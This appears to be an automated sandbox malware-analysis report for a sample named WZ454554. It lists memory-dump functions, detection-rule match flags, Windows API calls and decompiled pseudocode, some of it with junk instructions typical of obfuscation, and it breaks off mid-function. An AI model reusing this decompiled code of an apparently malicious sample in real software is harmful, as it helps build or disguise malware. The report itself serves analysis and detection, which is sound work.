                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                            • Instruction ID: 25d84ef502cca678b9d6221c364d5445cc460ae19c2d623ee562180b4174949b
                            • Opcode Fuzzy Hash: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                            • Instruction Fuzzy Hash: E290026A21300002E2907199540860A0445D7D1342F91D469A001555CCC9958879A361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                            • Instruction ID: 53e9bd124b765e80f14eaa712b881d3c6c690ff46bca6d91d9c9a931c7c1ba39
                            • Opcode Fuzzy Hash: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                            • Instruction Fuzzy Hash: D99002A220200003921571994414616444AD7E0341B51C075E1014598DC5A588A1B165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                            • Instruction ID: aee400a18e5975c5bd04f11886a138cf87def92b3cb6faa3bd63cf6596d6fe2a
                            • Opcode Fuzzy Hash: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                            • Instruction Fuzzy Hash: 5B9002B220100402E250719944047460445D7D0341F51C065A506455CE86D98DE5B6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                            • Instruction ID: 1f03a23ec1a8910f98b96e5c7e67ed0ff46a3554234b994723c3a80cd6ab346f
                            • Opcode Fuzzy Hash: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                            • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                            • Instruction ID: a47fe44ee44b720e8bbaf41e346c382c2bf0c91f565b75253757819afc6111ea
                            • Opcode Fuzzy Hash: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                            • Instruction Fuzzy Hash: 80900266211000035215A59907045070486D7D5391351C075F1015558CD6A18871A161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bd94853dc0a5bd11354a55791940ee758e33ee4005cfa9d67f5cf96289ab4c5c
                            • Instruction ID: d58fe8e4865b7a2b9ec26276515fb776abeb1cc765f7a728b76389d142a7d987
                            • Opcode Fuzzy Hash: bd94853dc0a5bd11354a55791940ee758e33ee4005cfa9d67f5cf96289ab4c5c
                            • Instruction Fuzzy Hash: 03213AB2D4020857CB25DA64AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A632, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFree
                            • String ID: 6EA
                            • API String ID: 2488874121-1400015478
                            • Opcode ID: 1d557a5bdeb8797b006a9a7fb27d5843ba595a8cb4ef730408706fc9a8a6a24d
                            • Instruction ID: 1d4856993a074e8d4dd964fd5c81ec8010bf2d73f27f98b8995e78655d8c423b
                            • Opcode Fuzzy Hash: 1d557a5bdeb8797b006a9a7fb27d5843ba595a8cb4ef730408706fc9a8a6a24d
                            • Instruction Fuzzy Hash: CC0124B52012006FCB14DF64DC85DE77BADEF84324F18854EF8488B206D234E926CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A600, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 20 41a600-41a631 call 41af30 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: 6EA
                            • API String ID: 1279760036-1400015478
                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A795, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 219 41a795-41a799 220 41a7f1-41a810 call 41af30 219->220 221 41a79b 219->221 222 41a72d-41a73f 221->222 223 41a79d 221->223 228 41a742-41a744 222->228 225 41a7a0-41a7ba call 41af30 223->225 226 41a72a-41a73f call 41af30 223->226 231 41a7bf-41a7d4 LookupPrivilegeValueW 225->231 226->228 231->220
                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 43ed906016db5ddaf999ee2ee8ce17cef1bae297214f11aba6a70d9e5cee2cab
                            • Instruction ID: d4f3dee67109d40539c3ec041c47eadc6524c3fb295b42679d0b5e224d0e81c1
                            • Opcode Fuzzy Hash: 43ed906016db5ddaf999ee2ee8ce17cef1bae297214f11aba6a70d9e5cee2cab
                            • Instruction Fuzzy Hash: 60018BB16012046FCB10EF59DC80DEB33ADEF88328F11845AFD1957242D534EA658BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00408308, Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 234 408308-40835a call 41be40 call 41c9e0 call 40acf0 call 414e50 243 40835c-40836e PostThreadMessageW 234->243 244 40838e-408392 234->244 245 408370-40838a call 40a480 243->245 246 40838d 243->246 245->246 246->244
                            C-Code - Quality: 67%
                            			E00408308(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr _v20912277;
				void* _t13;
				int _t14;
				long _t21;
				int _t26;
				intOrPtr _t28;
				void* _t29;
				void* _t31;

				_v20912277 = _t28;
				asm("fdivr dword [ebp-0x7c1374ab]");
				_push(_t28);
				_t29 = _t31;
				_v68 = 0;
				E0041BE40( &_v67, 0, 0x3f);
				E0041C9E0( &_v68, 3);
				_t13 = E0040ACF0(_a4 + 0x1c,  &_v68); // executed
				_t14 = E00414E50(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
				_t26 = _t14;
				if(_t26 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t37 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t21, 0x8003, _t29 + (E0040A480(_t37, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
				}
				return _t14;
			}













                            0x00408308
                            0x0040830e
                            0x00408310
                            0x00408311
                            0x0040831f
                            0x00408323
                            0x0040832e
                            0x0040833e
                            0x0040834e
                            0x00408353
                            0x0040835a
                            0x0040835d
                            0x0040836a
                            0x0040836c
                            0x0040836e
                            0x0040838b
                            0x0040838b
                            0x0040838d
                            0x00408392

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: dda809d41443d332451abcc032d5a115ee509d9a850a33b2ac0108cf568ee872
                            • Instruction ID: 67acbd43067148f66e9af467f07538772aaa8c9b109c742f40efc1d74d046f7d
                            • Opcode Fuzzy Hash: dda809d41443d332451abcc032d5a115ee509d9a850a33b2ac0108cf568ee872
                            • Instruction Fuzzy Hash: 9801B971A40318BAE7209A519D43FFE7B689B40F55F05011EFF04FA1C1D6B9250647E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 249 408310-40831f 250 408328-40835a call 41c9e0 call 40acf0 call 414e50 249->250 251 408323 call 41be40 249->251 258 40835c-40836e PostThreadMessageW 250->258 259 40838e-408392 250->259 251->250 260 408370-40838a call 40a480 258->260 261 40838d 258->261 260->261 261->259
                            C-Code - Quality: 82%
                            			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BE40( &_v67, 0, 0x3f);
				E0041C9E0( &_v68, 3);
				_t12 = E0040ACF0(_a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                            0x0040831f
                            0x00408323
                            0x0040832e
                            0x0040833e
                            0x0040834e
                            0x00408353
                            0x0040835a
                            0x0040835d
                            0x0040836a
                            0x0040836c
                            0x0040836e
                            0x0040838b
                            0x0040838b
                            0x00000000
                            0x0040838d
                            0x00408392

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
                            • Instruction ID: ee4297080f87ae1612e18f34f2b0feab3a9f48bf419a2075f585a901aa565cbe
                            • Opcode Fuzzy Hash: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
                            • Instruction Fuzzy Hash: C201A771A8032877E720A6959C43FFF776C5B40F54F05012EFF04BA1C2EAA8690546FA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A640, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A7A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0041A7A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                            0x0041a7ba
                            0x0041a7d0
                            0x0041a7d4

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A674, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E0041A674(intOrPtr _a4, int _a8) {
				void* _t14;

				asm("aas");
				asm("daa");
				asm("arpl [ecx-0x74aab6f7], dx");
				_t7 = _a4;
				E0041AF30(_t14, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                            0x0041a674
                            0x0041a675
                            0x0041a67c
                            0x0041a683
                            0x0041a69a
                            0x0041a6a8

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 43dcdfa21198976dcfa5224ba3d0e2e90ea188ab3e722dd0fc2e92714ce91fe6
                            • Instruction ID: 1578738610a6ea4291e70077509fac528e5ed1af7738aeb7d68a80aa7709374d
                            • Opcode Fuzzy Hash: 43dcdfa21198976dcfa5224ba3d0e2e90ea188ab3e722dd0fc2e92714ce91fe6
                            • Instruction Fuzzy Hash: CBE08C75A202007AD720EF64CC86FD33BA8EF19358F158179B9299F342D536A601CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A680, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0041A680(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                            0x0041a683
                            0x0041a69a
                            0x0041a6a8

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                            • Instruction ID: fd774d3b0bc61d3a7aa453021c1500bd91abd8bee620a0c201bc48005ce4c1ae
                            • Opcode Fuzzy Hash: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                            • Instruction Fuzzy Hash: 6DB09B729014C5C5E751D7E146087277E40BBD0741F16C065E2034645A4778C491F5B6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00B6B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                            Download Yara Rule
                            Strings
                            • The resource is owned exclusively by thread %p, xrefs: 00B6B374
                            • Go determine why that thread has not released the critical section., xrefs: 00B6B3C5
                            • read from, xrefs: 00B6B4AD, 00B6B4B2
                            • The instruction at %p tried to %s , xrefs: 00B6B4B6
                            • *** enter .exr %p for the exception record, xrefs: 00B6B4F1
                            • <unknown>, xrefs: 00B6B27E, 00B6B2D1, 00B6B350, 00B6B399, 00B6B417, 00B6B48E
                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B6B38F
                            • *** An Access Violation occurred in %ws:%s, xrefs: 00B6B48F
                            • The instruction at %p referenced memory at %p., xrefs: 00B6B432
                            • write to, xrefs: 00B6B4A6
                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B6B484
                            • The critical section is owned by thread %p., xrefs: 00B6B3B9
                            • *** enter .cxr %p for the context, xrefs: 00B6B50D
                            • This failed because of error %Ix., xrefs: 00B6B446
                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B6B39B
                            • a NULL pointer, xrefs: 00B6B4E0
                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B6B3D6
                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B6B476
                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B6B314
                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B6B323
                            • The resource is owned shared by %d threads, xrefs: 00B6B37E
                            • *** Resource timeout (%p) in %ws:%s, xrefs: 00B6B352
                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B6B53F
                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00B6B2F3
                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B6B2DC
                            • *** then kb to get the faulting stack, xrefs: 00B6B51C
                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B6B47D
                            • an invalid address, %p, xrefs: 00B6B4CF
                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B6B305
                            • *** Inpage error in %ws:%s, xrefs: 00B6B418
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                            • API String ID: 0-108210295
                            • Opcode ID: 7f942ead7346f801e238f88fb17fd331a5062d5a2d0a05da5570aad4d30466bc
                            • Instruction ID: b8f9a6930ff489e8c9a66150ab45d390be31517b125fe512ddebebb513dac025
                            • Opcode Fuzzy Hash: 7f942ead7346f801e238f88fb17fd331a5062d5a2d0a05da5570aad4d30466bc
                            • Instruction Fuzzy Hash: 40810471A40610FFCB31AA058C86D7B3BB5EF57B51F4040D4F105AB293D7698A92EBB2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AB40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                            Download Yara Rule
                            C-Code - Quality: 29%
                            			E00AB40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00ABB150();
					} else {
						E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00ABB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00ABB150(", passed to %s", _t29);
					}
					_push("\n");
					E00ABB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xba6378 = 1;
						asm("int3");
						 *0xba6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                            0x00ab40e6
                            0x00ab40e8
                            0x00ab40f1
                            0x00b1042d
                            0x00b1044c
                            0x00b10451
                            0x00b1042f
                            0x00b10444
                            0x00b10449
                            0x00b1045d
                            0x00b10466
                            0x00b1046e
                            0x00b10474
                            0x00b10475
                            0x00b1047a
                            0x00b1048a
                            0x00b1048c
                            0x00b10493
                            0x00b10494
                            0x00b10494
                            0x00000000
                            0x00b1049b
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                            • API String ID: 0-188067316
                            • Opcode ID: 970af8380fe31853277bbee6991012d39d54eadae60026ebdd429a25a246c3c7
                            • Instruction ID: 45165a7071a1190b1801c33a5a3b04310aa3204826f98c334833c3c07769ce4c
                            • Opcode Fuzzy Hash: 970af8380fe31853277bbee6991012d39d54eadae60026ebdd429a25a246c3c7
                            • Instruction Fuzzy Hash: F301F532221240AED619E768B5AEBD277FCEB01B30F288469F104477828BE498C0C124
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E00ADA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xba8748 - 1;
					if( *0xba8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
